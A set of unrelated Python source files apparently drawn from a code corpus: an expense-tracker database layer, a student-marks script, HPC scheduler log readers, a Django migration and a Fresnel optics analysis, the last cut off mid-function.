from sqlalchemy import create_engine
from sqlalchemy import Column, String, Integer, func, Boolean, Float, desc, text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from contextlib import contextmanager
from datetime import datetime
from kivy.properties import ObjectProperty
Base = declarative_base()
Session = ObjectProperty()
def init_session(f_path):
global Session
engine = create_engine(f"sqlite:///{f_path}")
Session = sessionmaker(bind=engine)
@contextmanager
def session_scope():
"""Provide a transactional scope around a series of operations."""
session = Session()
try:
yield session
session.commit()
except:
session.rollback()
raise
finally:
session.close()
class Items(Base):
"""Base user class"""
__tablename__ = "items"
item_id = Column(Integer,primary_key=True)
item_name = Column(String)
item_link = Column(Integer)
active = Column(Boolean)
def __init__(self, **kwargs):
self.item_id = kwargs['item_id']
self.item_name = kwargs['item_name']
self.item_link = kwargs['item_link']
self.active = kwargs['active']
def get_item(**kwargs):
item_name = kwargs['item_name']
item_link = kwargs['item_link']
item_id = None
with session_scope() as session:
if item_link is None:
item = session.query(Items).filter(Items.item_name == item_name).first()
else:
item = session.query(Items)\
.filter(Items.item_name == item_name, Items.item_link == item_link).first()
if item is not None:
item_id = item.item_id
return item_id
def get_all_items():
with session_scope() as session:
items = session.query(Items).order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def get_items(**kwargs):
item_name = kwargs['item_name']
item_type = kwargs['item_type']
with session_scope() as session:
if item_type == 'main':
items = session.query(Items).filter(Items.item_link == 0
, Items.item_name.like('%{}%'.format(item_name)))\
.order_by(Items.item_name).all()
elif item_type == 'sub':
items = session.query(Items).filter(Items.item_link != 0
, Items.item_name.like('%{}%'.format(item_name)))\
.order_by(Items.item_name).all()
elif item_type == 'all':
items = session.query(Items).filter(Items.item_name.like('%{}%'.format(item_name)))\
.order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def get_items_by_link(**kwargs):
item_link = kwargs['item_link']
with session_scope() as session:
items = session.query(Items).filter(Items.item_link == item_link)\
.order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def get_main_items():
with session_scope() as session:
items = session.query(Items).filter(Items.item_link == 0).order_by(Items.item_name).all()
item_dict = {}
for item in items:
item_dict[item.item_id] = {'item_name': item.item_name,
'item_link': item.item_link,
'active': item.active}
return item_dict
def update_active(**kwargs):
item_id = kwargs['item_id']
active = kwargs['active']
with session_scope() as session:
item = session.query(Items).filter(Items.item_id == item_id).first()
if item.item_link == 0:
session.query(Items).filter(Items.item_id == item_id).update({'active': active})
session.query(Items).filter(Items.item_link == item_id).update({'active': active})
return 'refresh'
else:
main_item = session.query(Items).filter(Items.item_id == item.item_link).first()
if main_item.active == False:
return 'revert'
else:
session.query(Items).filter(Items.item_id == item_id).update({'active': active})
return ''
def add_item(**kwargs):
with session_scope() as session:
item = Items(**kwargs)
session.add(item)
def get_next_item_id():
with session_scope() as session:
item_id = session.query(func.max(Items.item_id)).one()[0]
if item_id is None:
item_id = 1
else:
item_id = item_id + 1
return item_id
def data_correction():
with session_scope() as session:
session.query(Items).filter(Items.item_id == 22).update({'item_link': 0})
session.query(Items).filter(Items.item_id == 28).update({'item_name': 'Bus'})
session.query(Items).filter(Items.item_id == 29).update({'item_name': 'Train'})
item = session.query(Items.item_id).filter(Items.item_link == 25, Items.item_name == 'Flight').first()
if item is None:
item_id = Items.get_next_item_id()
session.add(Items(item_id=item_id, item_name='Flight', item_link=25, active=1))
session.query(Items).filter(Items.item_name == '').delete()
class Expenses(Base):
"""Base user class"""
__tablename__ = "expenses"
expense_id = Column(Integer, primary_key=True)
item_id = Column(Integer)
value = Column(Float)
date = Column(String)
def __init__(self, **kwargs):
self.expense_id = kwargs['expense_id']
self.item_id = kwargs['item_id']
self.value = kwargs['value']
self.date = kwargs['date']
def get_expenses(**kwargs):
date_type = kwargs['date_type']
query_date = kwargs['date']
with session_scope() as session:
if date_type == 'day':
expenses = session.query(Expenses.expense_id, Items.item_name, Expenses.value, Expenses.date)\
.filter(Items.item_id == Expenses.item_id).filter(Expenses.date == query_date).all()
expense_dict = {}
for expense in expenses:
expense_dict[expense.expense_id] = {'item_name': expense.item_name,
'value': expense.value,
'date': expense.date}
elif date_type == 'month':
month = query_date.strftime("%m")
year = query_date.strftime("%Y")
expenses = session.query(Expenses.date, func.sum(Expenses.value))\
.filter(Expenses.date.like('%{}-{}-%'.format(year, month)))\
.group_by(Expenses.date).all()
expense_dict = {}
for expense in expenses:
expense_dict[expense.date] = expense[1]
elif date_type == 'year':
query_year = int(query_date.strftime("%Y"))
expenses = session.query(Expenses).all()
expense_dict = {}
for expense in expenses:
ex_date = datetime.strptime(expense.date, '%Y-%m-%d')
if ex_date.year == query_year:
if ex_date.strftime('%b') in expense_dict.keys():
expense_dict[ex_date.strftime('%b')] = expense_dict[ex_date.strftime('%b')] + expense.value
else:
expense_dict[ex_date.strftime('%b')] = expense.value
return expense_dict
def add_expense(**kwargs):
with session_scope() as session:
expense = Expenses(**kwargs)
session.add(expense)
def del_expense(**kwargs):
expense_id = kwargs['expense_id']
with session_scope() as session:
session.query(Expenses).filter(Expenses.expense_id == expense_id).delete()
def get_next_exp_id():
with session_scope() as session:
expense_id = session.query(func.max(Expenses.expense_id)).one()[0]
if expense_id is None:
expense_id = 1
else:
expense_id = expense_id + 1
return expense_id
def get_borders():
expense_dict = {'MEDay': {'date': '1900-01-01', 'value': 0.0},
'LEDay': {'date': '1900-01-01', 'value': 0.0},
'LEMonth': {'date': '1900-01', 'value': 0.0},
'MEMonth': {'date': '1900-01', 'value': 0.0}
}
with session_scope() as session:
expense = session.query(Expenses.date, func.sum(Expenses.value).label('value_sum'))\
.having(text("value_sum > 0"))\
.group_by(Expenses.date).order_by(desc('value_sum')).first()
if expense is not None:
expense_dict['MEDay'] = {'date': expense[0], 'value': expense[1]}
expense = session.query(Expenses.date, func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by(Expenses.date).order_by('value_sum').first()
if expense is not None:
expense_dict['LEDay'] = {'date': expense[0], 'value': expense[1]}
expense = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('month').order_by('value_sum').first()
if expense is not None:
expense_dict['LEMonth'] = {'date': expense[0], 'value': expense[1]}
expense = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('month').order_by(desc('value_sum')).first()
if expense is not None:
expense_dict['MEMonth'] = {'date': expense[0], 'value': expense[1]}
return expense_dict
def get_totals(q_date):
query_date = q_date.strftime('%Y-%m-%d')
query_month = query_date[0:7]
query_year = query_date[0:4]
totals = {'day': 0.0, 'month': 0.0, 'year': 0.0}
with session_scope() as session:
day_total = session.query(func.sum(Expenses.value)) \
.filter(Expenses.date == query_date).group_by(Expenses.date).first()
if day_total is not None:
totals['day'] = day_total[0]
month_query = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.group_by('month')
month_subquery = month_query.subquery()
month_total = session.query(month_subquery.c.value_sum)\
.filter(month_subquery.c.month == query_month).first()
if month_total is not None:
totals['month'] = month_total[0]
year_query = session.query(func.substr(Expenses.date, 1, 4).label('year'),
func.sum(Expenses.value).label('value_sum')) \
.group_by('year')
year_subquery = year_query.subquery()
year_total = session.query(year_subquery.c.value_sum)\
.filter(year_subquery.c.year == query_year).first()
if year_total is not None:
totals['year'] = year_total[0]
return totals
def get_avgs():
expense_dict = {}
with session_scope() as session:
expense_query = session.query(Expenses.date, func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by(Expenses.date).subquery()
expense = session.query(func.avg(expense_query.c.value_sum)).first()
if expense[0] is not None:
expense_dict['day_avg'] = expense[0]
else:
expense_dict['day_avg'] = 0.0
expense_query = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('month').subquery()
expense = session.query(func.avg(expense_query.c.value_sum)).first()
if expense[0] is not None:
expense_dict['month_avg'] = expense[0]
else:
expense_dict['month_avg'] = 0.0
expense_query = session.query(func.substr(Expenses.date, 1, 4).label('year'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('year').subquery()
expense = session.query(func.avg(expense_query.c.value_sum)).first()
if expense[0] is not None:
expense_dict['year_avg'] = expense[0]
else:
expense_dict['year_avg'] = 0.0
return expense_dict
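# Minimal usage sketch (illustrative, not part of the app): init_session() must point
# at the SQLite file before any helper is used; session_scope() then commits on
# success and rolls back on error.
#
#   init_session("expenses.db")            # hypothetical path
#   Expenses.add_expense(expense_id=Expenses.get_next_exp_id(),
#                        item_id=1, value=9.5, date="2021-01-31")
#   print(Expenses.get_totals(datetime(2021, 1, 31)))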
| 1.90625 | 2 |
DAA_Assi.py | scorpion-11/2D_array_clustering | 0 | 43780 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 3 14:53:06 2019
@author: ISHA
"""
arr = [
[ 'XYZ', 1, 88, 56, 45],
[ 'ABC', 2, 45, 86, 52],
[ 'LMN', 3, 87, 39, 40],
[ 'QWS', 4, 96, 86, 85],
[ 'TRE', 5, 76, 56, 53],
[ 'UTH', 6, 35, 79, 48],
[ 'GHJ', 7, 88, 98, 88],
[ 'DFS', 8, 72, 80, 68],
[ 'CVB', 9, 45, 56, 50],
[ 'PQR', 10, 78, 36, 25]]
sumCol=[]
for i in range(len(arr)):
sumCol.append(0)
#sumCol[len(arr)]
#j = len(arr[0]);
for row in range (0,len(arr)):
# sumCol[row] = 0;
for col in range(2,len(arr[row])):
sumCol[row] = sumCol[row] + arr[row][col]
print("Average marks of all Students of T1, T2, T3 : ",sumCol)
print("Data of Students with greatest cluster are :")
print("- - - - - - - - - - - - - - - - - - - - - -")
print("\ Name \ Roll No \ T1 \ T2 \ T3 ")
print("- - - - - - - - - - - - - - - - - - - - - -")
for i in range(len(arr)):
if sumCol[i]>240:
for j in range(len(arr[i])):
print("\ ",arr[i][j], end='\t')
print()
print("- - - - - - - - - - - - - - - - - - - - - -")
| 2.046875 | 2 |
kronos_modeller/kronos_modeller/logreader/scheduler_reader.py | ecmwf/kronos | 4 | 43908 | # (C) Copyright 1996-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
import csv
import os
from datetime import datetime
from kronos_modeller.kronos_exceptions import ConfigurationError
from kronos_modeller.jobs import IngestedJob, ModelJob
from kronos_modeller.logreader.dataset import IngestedDataSet
def read_pbs_log(filename_in):
pbs_jobs = []
log_list_raw = ['ctime',
'qtime',
'etime',
'end',
'start',
'resources_used.ncpus',
'Resource_List.ncpus',
'resources_used.mem',
'resources_used.cpupercent',
'resources_used.cput',
'group',
'jobname',
'Resource_List.EC_nodes',
'queue'
]
    # - standardize the key names for different PBS log labels..
log_list = ['time_created',
'time_queued',
'time_eligible',
'time_end',
'time_start',
'ncpus',
'ncpus',
'memory_kb',
'cpu_percent',
'cpu_percent',
'group',
'jobname',
'nnodes',
'queue'
]
# Read file
f_in = open(filename_in, "r")
cc = 1
cce = 0
for line in f_in:
# array got by splitting the line
larray = line.split(" ")
b1_array = larray[1].split(";")
# block E
if (b1_array[1] == "E"):
# init dictionary
line_dict = {}
# user name
user_name = b1_array[3].split("=")[1]
line_dict["user"] = str(user_name)
for jobL in range(0, len(larray)):
yval_val = larray[jobL].split("=")
# print yval_val
if (len(yval_val) == 2):
if yval_val[0] in log_list_raw:
# find index
idx = log_list_raw.index(yval_val[0])
key_name = log_list[idx]
line_dict[key_name] = yval_val[1].strip()
# special case for ARCTUR PBS..
# Resource_List.nodes=1:ppn=1
if yval_val[0] == "Resource_List.nodes":
if len(yval_val[1].split(":")) > 1:
line_dict["nnodes"] = int(yval_val[1].split(":")[0])
if yval_val[1].split(":")[1] == "ppn":
line_dict["ncpus"] = int(yval_val[2]) * int(yval_val[1].split(":")[0])
else:
line_dict["ncpus"] = int(yval_val[1])
i_job = IngestedJob()
# print 'i_job.time_created ', line_dict['time_created']
# print 'i_job.time_queued ', line_dict['time_queued']
# print 'i_job.time_eligible', line_dict['time_eligible']
# print 'i_job.time_end ', line_dict['time_end']
# print 'i_job.time_start ', line_dict['time_start']
# print int(line_dict['ncpus'])
# print line_dict['time_created']
# print type( line_dict['time_created'] )
# print any(c.isalpha() for c in line_dict['time_created'])
# created time
if any([c.isalpha() for c in line_dict['time_created']]):
i_job.time_created = -1
else:
i_job.time_created = int(line_dict['time_created'])
# queue time
if any([c.isalpha() for c in line_dict['time_queued']]):
i_job.time_queued = -1
else:
i_job.time_queued = int(line_dict['time_queued'])
# eligible time
if any([c.isalpha() for c in line_dict['time_eligible']]):
i_job.time_eligible = -1
else:
i_job.time_eligible = int(line_dict['time_eligible'])
# end time
if any([c.isalpha() for c in line_dict['time_end']]):
i_job.time_end = -1
else:
i_job.time_end = int(line_dict['time_end'])
# start time
if any([c.isalpha() for c in line_dict['time_start']]):
i_job.time_start = -1
else:
i_job.time_start = int(line_dict['time_start'])
# average memory
if any([c.isalpha() for c in line_dict['memory_kb'][:-2]]):
i_job.memory_kb = -1
else:
i_job.memory_kb = int(line_dict['memory_kb'][:-2])
if 'ncpus' in line_dict:
i_job.ncpus = int(line_dict['ncpus'])
else:
i_job.ncpus = -1
if 'nnodes' in line_dict:
i_job.nnodes = int(line_dict['nnodes'])
else:
i_job.nnodes = -1
# i_job.cpu_percent = float(line_dict['cpu_percent'].replace(":", ""))
i_job.group = str(line_dict['group'])
i_job.jobname = str(line_dict['jobname'])
i_job.user = str(line_dict['user'])
i_job.queue_type = str(line_dict['queue'])
i_job.cmd_str = None # command line string not available
pbs_jobs.append(i_job)
cce += 1
cc += 1
# remove invalid entries
pbs_jobs[:] = [job for job in pbs_jobs if job.time_start != -1]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_end != -1]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_end >= job.time_start]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_queued != -1]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_start >= job.time_queued]
pbs_jobs[:] = [job for job in pbs_jobs if job.ncpus > 0]
pbs_jobs[:] = [job for job in pbs_jobs if job.nnodes > 0]
for (ii, i_job) in enumerate(pbs_jobs):
i_job.idx_in_log = ii
pbs_jobs.sort(key=lambda x: x.time_start, reverse=False)
# times relative to start of log
min_start_time = min([i_job.time_start for i_job in pbs_jobs])
for i_job in pbs_jobs:
i_job.runtime = float(i_job.time_end) - float(i_job.time_start)
i_job.time_start_0 = i_job.time_start - min_start_time
i_job.time_in_queue = i_job.time_start - i_job.time_queued
return pbs_jobs
def read_accounting_logs(filename_in):
"""
Reads ecmwf accounting logs
:param filename_in:
:return:
"""
accounting_jobs = []
# ['"hpc"',
# '"jobid"',
# '"jobname"',
# '"jobstepid"',
# '"owner_uid"',
# '"owner_group"',
# '"submitter_uid"',
# '"submitter_group"',
# '"queue_time"',
# '"start_time"',
# '"end_time"',
# '"no_nodes"',
# '"no_cpus"',
# '"class"',
# '"account"',
# '"usage"',
# '"sbu"',
# '"step_usertime"',
# '"stdin"',
# '"stdout"',
# '"stderr"',
# '"job_name"']
with open(filename_in, 'rb') as csvfile:
csv_dict = csv.DictReader(csvfile, delimiter=';', quotechar='"')
for line_dict in csv_dict:
i_job = IngestedJob()
try:
i_job.time_queued = (datetime.strptime(line_dict['queue_time'], '%Y-%m-%d %H:%M:%S') -
datetime(1970, 1, 1)).total_seconds()
except ValueError:
i_job.time_queued = (datetime.strptime(line_dict['queue_time'], '%Y-%m-%d %H:%M:%S.%f') -
datetime(1970, 1, 1)).total_seconds()
try:
i_job.time_end = (datetime.strptime(line_dict['end_time'], '%Y-%m-%d %H:%M:%S.%f') -
datetime(1970, 1, 1)).total_seconds()
except ValueError:
i_job.time_end = (datetime.strptime(line_dict['end_time'], '%Y-%m-%d %H:%M:%S') -
datetime(1970, 1, 1)).total_seconds()
try:
i_job.time_start = (datetime.strptime(line_dict['start_time'], '%Y-%m-%d %H:%M:%S.%f') -
datetime(1970, 1, 1)).total_seconds()
except ValueError:
i_job.time_start = (datetime.strptime(line_dict['start_time'], '%Y-%m-%d %H:%M:%S') -
datetime(1970, 1, 1)).total_seconds()
if 'no_cpus' in line_dict:
i_job.ncpus = int(line_dict['no_cpus'])
else:
i_job.ncpus = -1
if 'no_nodes' in line_dict:
i_job.nnodes = int(line_dict['no_nodes'])
else:
i_job.nnodes = -1
if 'stdout' in line_dict:
i_job.stdout = line_dict['stdout']
else:
i_job.stdout = []
# i_job.cpu_percent = float(line_dict['cpu_percent'].replace(":", ""))
i_job.group = str(line_dict['owner_group'])
i_job.jobname = str(line_dict['jobname'])
i_job.user = str(line_dict['owner_uid'])
i_job.queue_type = str(line_dict['class'])
i_job.cmd_str = None # command line string not available
# info not available
i_job.time_created = -1
i_job.time_eligible = -1
i_job.memory_kb = -1
accounting_jobs.append(i_job)
# remove invalid entries
accounting_jobs[:] = [job for job in accounting_jobs if job.time_start != -1]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_end != -1]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_end >= job.time_start]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_queued != -1]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_start >= job.time_queued]
accounting_jobs[:] = [job for job in accounting_jobs if job.ncpus > 0]
accounting_jobs[:] = [job for job in accounting_jobs if job.nnodes > 0]
# store the original idx of each job..
for (ii, i_job) in enumerate(accounting_jobs):
i_job.idx_in_log = ii
accounting_jobs.sort(key=lambda x: x.time_start, reverse=False)
# times relative to start of log
min_start_time = min([i_job.time_start for i_job in accounting_jobs])
for i_job in accounting_jobs:
# print type(i_job.time_queued), type(i_job.time_end), type(i_job.time_start)
i_job.runtime = float(i_job.time_end) - float(i_job.time_start)
i_job.time_start_0 = i_job.time_start - min_start_time
i_job.time_in_queue = i_job.time_start - i_job.time_queued
return accounting_jobs
def read_epcc_csv_logs(filename_in):
""" read CSV logs from EPCC.. """
csv_jobs = []
with open(filename_in, 'rb') as csvfile:
csv_dict = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for line_dict in csv_dict:
i_job = IngestedJob()
# if isinstance(line_dict['ctime'], str):
# # i_job.time_queued = int(line_dict['ctime'])
# i_job.time_queued = int(line_dict['start']) + 999 # will be removed later..
# else:
# print "line_dict['ctime']: ", line_dict['ctime']
# i_job.time_queued = int(line_dict['start']) + 999 # will be removed later..
try:
i_job.time_queued = int(line_dict['ctime'])
except:
print(("I didn't recognize ctime {0} as a number".format(line_dict['ctime'])))
i_job.time_queued = -1
try:
i_job.time_end = int(line_dict['end'])
except:
print(("I didn't recognize end {0} as a number".format(line_dict['end'])))
i_job.time_end = -1
try:
i_job.time_start = int(line_dict['start'])
except:
print(("I didn't recognize start {0} as a number".format(line_dict['start'])))
i_job.time_start = -1
try:
i_job.ncpus = int(line_dict['ncpus'])
except:
print(("I didn't recognize start {0} as a number".format(line_dict['ncpus'])))
i_job.ncpus = -1
try:
i_job.nnodes = int(line_dict['node_count'])
except:
print(("I didn't recognize start {0} as a number".format(line_dict['node_count'])))
i_job.nnodes = -1
# i_job.group = line_dict['group'].strip()
i_job.group = ''
if line_dict['jobname']:
i_job.jobname = line_dict['jobname'].strip()
else:
i_job.jobname = ''
if line_dict['jobname']:
i_job.user = line_dict['UserID'].strip()
else:
i_job.user = ''
if line_dict['jobname']:
i_job.queue_type = line_dict['queue'].strip()
else:
i_job.queue_type = ''
# info not available
i_job.time_created = -1
i_job.time_eligible = -1
i_job.memory_kb = -1
i_job.cmd_str = None # command line string not available
csv_jobs.append(i_job)
# remove invalid entries
csv_jobs[:] = [job for job in csv_jobs if job.time_start != -1]
csv_jobs[:] = [job for job in csv_jobs if job.time_end != -1]
csv_jobs[:] = [job for job in csv_jobs if job.time_end >= job.time_start]
csv_jobs[:] = [job for job in csv_jobs if job.time_queued != -1]
csv_jobs[:] = [job for job in csv_jobs if job.time_start >= job.time_queued]
csv_jobs[:] = [job for job in csv_jobs if job.ncpus > 0]
csv_jobs[:] = [job for job in csv_jobs if job.nnodes > 0]
# store the original idx of each job..
for (ii, i_job) in enumerate(csv_jobs):
i_job.idx_in_log = ii
csv_jobs.sort(key=lambda x: x.time_start, reverse=False)
# times relative to start of log
min_start_time = min([i_job.time_start for i_job in csv_jobs])
for i_job in csv_jobs:
# print type(i_job.time_queued), type(i_job.time_end), type(i_job.time_start)
i_job.runtime = float(i_job.time_end) - float(i_job.time_start)
i_job.time_start_0 = i_job.time_start - min_start_time
i_job.time_in_queue = i_job.time_start - i_job.time_queued
return csv_jobs
class PBSDataSet(IngestedDataSet):
def __init__(self, joblist, *args, **kwargs):
super(PBSDataSet, self).__init__(joblist, '.', {'cache':False})
# The created times are all in seconds since an arbitrary reference, so we want to get
# them relative to a zero-time
created_time_list = [j.time_created for j in self.joblist if j.time_created >= 0]
self.global_created_time = 0.0
if created_time_list:
self.global_created_time = min(created_time_list)
        start_time_list = [j.time_start for j in self.joblist if j.time_start >= 0]
self.global_start_time = 0.0
if start_time_list:
self.global_start_time = min(start_time_list)
def model_jobs(self):
for job in self.joblist:
# assert isinstance(job, IngestedJob)
assert not job.timesignals
# if job.time_created >= 0:
# submit_time = job.time_created - self.global_created_time
# else:
# submit_time = job.time_start - self.global_start_time
yield ModelJob(
job_name=job.jobname,
user_name=job.user,
cmd_str=job.cmd_str,
queue_name=job.queue_type,
time_queued=job.time_queued,
time_start=job.time_start,
duration=job.time_end-job.time_start,
ncpus=job.ncpus,
nnodes=job.nnodes,
stdout=job.stdout,
label=None,
)
def ingest_pbs_logs(path, cfg=None):
"""
Read PBS logs into a dataset
"""
if not os.path.exists(path):
raise ConfigurationError("Specified path to ingest PBS profiles does not exist: {}".format(path))
if not os.path.isfile(path):
raise ConfigurationError("Specified path for PBS time_schedule is not a file")
jobs = read_pbs_log(path)
return PBSDataSet(jobs)
def ingest_epcc_csv_logs(path, cfg=None):
"""
    Read EPCC CSV logs into a dataset
"""
if not os.path.exists(path):
raise ConfigurationError("Specified path to ingest CSV profiles does not exist: {}".format(path))
if not os.path.isfile(path):
raise ConfigurationError("Specified path for CSV time_schedule is not a file")
jobs = read_epcc_csv_logs(path)
return PBSDataSet(jobs)
class AccountingDataSet(IngestedDataSet):
def __init__(self, joblist, *args, **kwargs):
super(AccountingDataSet, self).__init__(joblist, '.', {'cache':False})
# The created times are all in seconds since an arbitrary reference, so we want to get
# them relative to a zero-time
self.global_start_time = min((j.time_start for j in self.joblist if j.time_start >= 0))
def model_jobs(self):
for job in self.joblist:
assert isinstance(job, IngestedJob)
assert not job.timesignals
# yield ModelJob(
# time_start=job.time_start - self.global_start_time,
# duration=job.time_end-job.time_start,
# ncpus=job.ncpus,
# nnodes=job.nnodes,
# scheduler_timing=job.time_queued,
# stdout=job.stdout
# )
yield ModelJob(
job_name=job.jobname,
user_name=job.user,
cmd_str=job.cmd_str,
queue_name=job.queue_type,
time_queued=job.time_queued,
time_start=job.time_start,
duration=job.time_end - job.time_start,
ncpus=job.ncpus,
nnodes=job.nnodes,
scheduler_timing=job.time_queued,
stdout=job.stdout,
label=None,
)
def ingest_accounting_logs(path, cfg=None):
"""
    Read accounting logs into a dataset
"""
if not os.path.exists(path):
raise ConfigurationError("Specified path to ingest accounting profiles does not exist: {}".format(path))
if not os.path.isfile(path):
raise ConfigurationError("Specified path for accounting log is not a file")
jobs = read_accounting_logs(path)
return PBSDataSet(jobs)
| 1.570313 | 2 |
course_selection/migrations/0021_auto_20150905_0817.py | PrincetonUSG/ReCal | 13 | 44036 | <filename>course_selection/migrations/0021_auto_20150905_0817.py<gh_stars>10-100
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('course_selection', '0020_auto_20150903_0501'),
]
operations = [
migrations.RemoveField(
model_name='friend_request',
name='accepted',
),
migrations.AddField(
model_name='friend_request',
name='status',
field=models.CharField(default=b'PEN', max_length=3, choices=[(b'PEN', b'Pending'), (b'ACC', b'Accepted'), (b'REJ', b'Rejected')]),
preserve_default=True,
),
]
| 0.871094 | 1 |
ana/fresnel.py | hanswenzel/opticks | 11 | 44164 | <filename>ana/fresnel.py
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
fresnel.py : analytic reflection expectations
==================================================
"""
import os, logging
log = logging.getLogger(__name__)
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from opticks.ana.base import opticks_environment
from opticks.ana.nbase import count_unique
np.set_printoptions(suppress=True, precision=3)
def fresnel(x, n1, n2, spol=True):
"""
https://en.wikipedia.org/wiki/Fresnel_equations
"""
cx = np.cos(x)
sx = np.sin(x)
disc = 1. - np.square(n1*sx/n2)
qdisc = np.sqrt(disc)
pass
if spol:
num = (n1*cx - n2*qdisc)
den = (n1*cx + n2*qdisc)
else:
num = (n1*qdisc - n2*cx)
den = (n1*qdisc + n2*cx)
pass
return np.square(num/den)
def fresnel_factor(seqhis, i, n1, n2, spol=True):
"""
:param seqhis: history sequence string eg "TO BT BR BT SA"
:param n1: refractive index of initial material
:param n2: refractive index of material that is transmitted into
Not aiming for generality, only works for simple geometries like raindrops, prisms, lens
"""
seqs = seqhis.split(" ")
rx = fresnel(i, n1, n2, spol=spol )
tx = 1 - rx
ff = np.ones(len(i))
for step in seqs:
#print step
if step in ("TO", "SA"):continue
if step == "BT":
ff *= tx
elif step == "BR":
ff *= rx
else:
assert 0, step
pass
pass
return ff
def fresnel_s( i, n, method=0):
"""
sin(i-r) si cr - ci sr
-------- = -------------
sin(i+r) si cr + ci sr
This form whilst pretty, gives nan at normal incidence, 0/0
"""
si = np.sin(i)
sr = si/n
if method == 0:
ci = np.sqrt( 1 - si*si )
cr = np.sqrt( 1 - sr*sr )
num = si*cr - ci*sr
den = si*cr + ci*sr
else:
i = np.arcsin(si)
r = np.arcsin(sr)
num = np.sin(i - r)
den = np.sin(i + r)
#log.info("i %s r %s num %s den %s " % (i,r,num,den))
pass
return np.square(num/den)
def fresnel_p( i, n):
"""
tan(i-r)
--------
tan(i+r)
"""
si = np.sin(i)
sr = si/n
i = np.arcsin(si)
r = np.arcsin(sr)
num = np.tan(i - r)
den = np.tan(i + r)
return np.square(num/den)
class Fresnel(object):
def __init__(self, n1, n2, dom=None ):
if dom is None:
dom = np.linspace(0,90,91)
n1 = np.asarray(n1)
n2 = np.asarray(n2)
th = dom*np.pi/180.
spol = fresnel(th, n1, n2, True)
ppol = fresnel(th, n1, n2, False)
pass
self.n1 = n1
self.n2 = n2
self.dom = dom
self.th = th
self.spol_0 = spol
self.ppol_0 = ppol
#self.alternative_check()
self.cen = (dom[:-1] + dom[1:])/2.
# avg of bin edge values
self.spol = (spol[:-1] + spol[1:])/2.
self.ppol = (ppol[:-1] + ppol[1:])/2.
self.upol = (self.spol+self.ppol)/2. # unpol?
self.brewster = np.arctan(n2/n1)*180./np.pi
self.critical = np.arcsin(n1/n2)*180./np.pi
def alternative_check(self):
"""
Alternative angle difference forms, misbehave at normal incidence
Otherwise they match
"""
th = self.th
n1 = self.n1
n2 = self.n2
spol_0 = self.spol_0
ppol_0 = self.ppol_0
spol_2 = fresnel_s( th, n2/n1, method=1)
spol_3 = fresnel_s( th, n2/n1, method=0)
assert np.allclose( spol_0[1:], spol_2[1:] ), np.dstack([spol_0,spol_2, spol_3])
assert np.allclose( spol_0[1:], spol_3[1:] ), np.dstack([spol_0,spol_2, spol_3])
ppol_2 = fresnel_p( th, n2/n1)
assert np.allclose( ppol_0[1:], ppol_2[1:] ), np.dstack([ppol_0, ppol_2])
def __call__(self, xd, n):
x = xd*np.pi/180.
n1 = self.n1
n2 = self.n2
cx = np.cos(x)
sx = np.sin(x)
disc = 1. - np.square(n1*sx/n2)
qdisc = np.sqrt(disc)
pass
spol = np.square((n1*cx - n2*qdisc)/(n1*cx + n2*qdisc))
ppol = np.square((n1*qdisc - n2*cx)/(n1*qdisc + n2*cx))
        f = 0.5  # assumed fraction of S-polarised light (i.e. unpolarised input)
        return n*(spol*f + (1.-f)*ppol)
def pl(self):
plt.plot(self.cen, self.spol, label="S (perp)", c="r")
plt.plot(self.cen, self.ppol, label="P (para)", c="b")
def title(self):
return "Fresnel %4.3f/%4.3f " % (self.n1, self.n2 )
def plot(self, fig, ny=1, nx=1, n=1, log_=False):
plt.title(self.title())
ax = fig.add_subplot(ny,nx,n)
self.pl()
self.angles()
legend = ax.legend(loc='upper left', shadow=True)
if log_:
ax.set_yscale('log')
def angles(self):
a = self.brewster
plt.plot([a, a], [1e-6, 1], 'k-', c="b", lw=2, label="Brewster")
a = self.critical
